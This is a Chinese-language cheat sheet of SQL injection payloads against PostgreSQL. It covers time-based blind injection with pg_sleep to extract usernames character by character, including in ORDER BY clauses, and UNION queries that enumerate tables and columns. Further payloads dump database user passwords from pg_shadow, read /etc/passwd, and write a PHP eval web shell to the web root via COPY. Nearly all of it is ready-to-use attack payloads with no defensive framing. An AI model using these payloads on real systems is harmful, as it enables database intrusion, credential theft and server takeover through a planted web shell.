数字: (SELECT * FROM [TABLE] WHERE [COLUMN]=1|(SELECT (SELECT CASE WHEN COUNT((SELECT pg_sleep(20)))<>0 THEN 1 ELSE 2 END))) ss; -- - 字符串: (SELECT * FROM [TABLE] WHERE [COLUMN] = 'asd'::varchar||(SELECT (SELECT CASE WHEN COUNT((SELECT pg_sleep(20)))<>0 THEN 1 ELSE 2 END))) ss; -- -
注入语句为
(SELECT * FROM address WHERE address=''||(SELECT CASE WHEN (SELECT COUNT((SELECT username FROM staff WHERE username SIMILAR TO 'M%')))<>0 THEN pg_sleep(20) ELSE '' END)) ss; -- -;
最终效果为:
SELECT address FROM (SELECT * FROM address WHERE address=''||(SELECT CASE WHEN (SELECT COUNT((SELECT username FROM staff WHERE username SIMILAR TO 'M%')))<>0 THEN pg_sleep(20) ELSE '' END)) ss; -- -;
根据SELECT username FROM staff WHERE username SIMILAR TO 'M%'返回的内容与否,它会休眠20秒,或者什么也不做。可以逐字节fuzz数据。
order by
注入点测试:是否延时
(SELECT CASE WHEN COUNT((SELECT pg_sleep(20)))<>0 THEN true ELSE false END); -- -
利用order by的true或者false
(SELECT CASE WHEN COUNT((SELECT (SELECT CASE WHEN COUNT((SELECT username FROM staff WHERE username SIMILAR TO 'M%'))<>0 THEN pg_sleep(20) ELSE '' END)))<>0 THEN true ELSE false END); -- -
如果第一个COUNT函数没有返回零,那么对于ORDER BY,我们得到最终的true或false。
正确或错误取决于内部选择(第二个查询是核心判断的)。
内部选择将休眠20秒,或者什么也不返回。
这取决于人员表中用户的首字母是否以M开头(这是SELECT username FROM staff WHERE username SIMILAR TO 'M%'部分)。
and 1=2 union select table_name,null,null from information_schema.tables limit 1 offset n-- and 1=2 union select column_name,null,null from information_schema.columns where table_name='admin' limit 1 offset n-- (老版本) pg_class.oid对应pg_attribute.attrelid pg_class.relname表名 pg_attribute.attname字段名 select relname from pg_class获取表名 select oid from pg_class wehre relname='admin'获取表的oid select attname from pg_attribute where attrelid='oid的值' 获取字段名
获取数据
nd 1=2 union select username||chr(124)||passwd,null,null from pg_shadow limit 1 offset 0--爆数据库用户密码
读写文件
老版本写文件: create table beach(shell text) insert into beach values('<?php eval($_POST[c])?>') copy beach(shell) to '/var/www/html/shell.php' drop table beach
#PS:copy (select '<?php eval($_POST[c])?>') to '/var/www/html/shell.php'
老版本读文件: create table beach(shell text) copy beach(shell) from '/etc/passwd' select * from beach limit 1 offset n读每一行